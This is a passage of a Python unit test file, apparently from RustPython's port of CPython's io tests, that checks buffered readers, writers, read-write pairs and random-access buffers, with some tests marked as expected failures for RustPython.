self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
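# A worked reading of the first row (a sketch, not part of the test data):
# with bufsize=100 the buffered reads of 3, 1, 4 and 8 bytes are all served
# from a single raw read of dlen (9) bytes, and the final over-long read
# triggers one more raw read that returns 0 bytes at EOF, hence [dlen, 0].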
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
# Silence destructor error
bufio.close = lambda: None
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
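# A hypothetical illustration (not exercised below, which uses MockRawIO):
# if a socket has already delivered exactly the n requested bytes, a further
# raw read issued only to top up the buffer could block waiting for data
# that may never arrive.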
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
@unittest.skip("TODO: RUSTPYTHON, fallible allocation")
@unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading differently, so that
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends up in gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
@unittest.skip("TODO: RUSTPYTHON, pyio version depends on memoryview.cast()")
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
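# Concretely: contents is 16 bytes and the buffer holds 8, so at least the
# first 16 - 8 = 8 bytes must already appear in writer._write_stack.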
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
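# A rough accounting (following the comments above): of the 18 bytes passed
# in, 8 are written to raw and 8 remain buffered, so characters_written is
# 16 and the trailing 2 bytes are lost.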
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, "wb") as f:
# Fill the file with some initial data
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(support.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
# After the write, write_pos and write_end are set to 0
f.read(1)
# The read operation makes sure that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
# Silence destructor error
bufio.close = lambda: None
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
def test_slow_close_from_thread(self):
# Issue #31976
rawio = self.SlowFlushRawIO()
bufio = self.tp(rawio, 8)
t = threading.Thread(target=bufio.close)
t.start()
rawio.in_flush.wait()
self.assertRaises(ValueError, bufio.write, b'spam')
self.assertTrue(bufio.closed)
t.join()
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
@unittest.skip("TODO: RUSTPYTHON, fallible allocation")
@unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends up in gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
@unittest.skip("TODO: RUSTPYTHON, pyio version depends on memoryview.cast()")
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
# Silence destructor error
reader.close = lambda: None
# TODO: RUSTPYTHON, sys.unraisablehook
@unittest.expectedFailure
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
writer.close = lambda: None
writer = None
# Ignore BufferedWriter (of the BufferedRWPair) unraisable exception
with support.catch_unraisable_exception():
# Ignore BufferedRWPair unraisable exception
with support.catch_unraisable_exception():
pair = None
support.gc_collect()
support.gc_collect()
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
reader.close = lambda: None
writer.close = lambda: None
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
@unittest.skip("TODO: RUSTPYTHON, pyio version depends on memoryview.cast()")
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if needed
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
